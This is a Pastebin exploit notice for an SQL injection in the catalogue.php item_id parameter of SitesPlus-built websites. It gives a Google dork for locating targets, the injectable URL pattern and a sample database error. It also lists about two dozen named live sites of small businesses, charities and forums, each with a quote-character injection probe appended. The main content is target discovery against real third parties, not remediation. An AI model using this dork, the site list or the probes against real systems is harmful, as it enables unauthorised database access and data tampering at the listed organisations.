Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Build your own website with SitesPlus England SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 08/04/2020
- # Vendor Homepage : sitesplus.co.uk
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Build your own website with SitesPlus inurl:/catalogue.php
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Impact :
- ***********
- Build your own website with SitesPlus England is prone to an SQL-injection vulnerability because
- it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or
- modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application and
- execute arbitrary SQL commands in application`s database. Further exploitation of this
- vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- ###################################################################
- # SQL Vulnerable File :
- **********************
- /catalogue.php
- # SQL Vulnerable Parameter :
- ***************************
- ?cat=[ID-NUMBER]&subCat=[ID-NUMBER]&item_id=[SQL Injection]
- # SQL Injection Exploit :
- **********************
- /catalogue.php?cat=[ID-NUMBER]&subCat=[ID-NUMBER]&item_id=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- [+] makingitlocal.org/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] realdevon.com/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] tastymusic.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] monktoncourthotel.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] redlandhouse.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] devontownsforum.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] supplements4wellbeing.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] ellisesfarm.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] northcliffparktenby.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] devoncounsellingservices.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] courthallmonkton.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] rowerfort.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] bishopscleevechamber.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] glfootwear.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] sherbornevaledtc.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] homesforholsworthy.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] digitalmentors.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] theblackdownhillstrust.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] ellisesfarm.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] wellingtonwithoutpc.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] devontownsforum.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] basildondas.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] supplements4wellbeing.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- [+] wiserhealth.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- MySql error message when opening the query: You have an error in your SQL syntax;
- check the manual that corresponds to your MariaDB server version for the right syntax
- to use near 'ORDER by sort_order ASC' at line 1
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement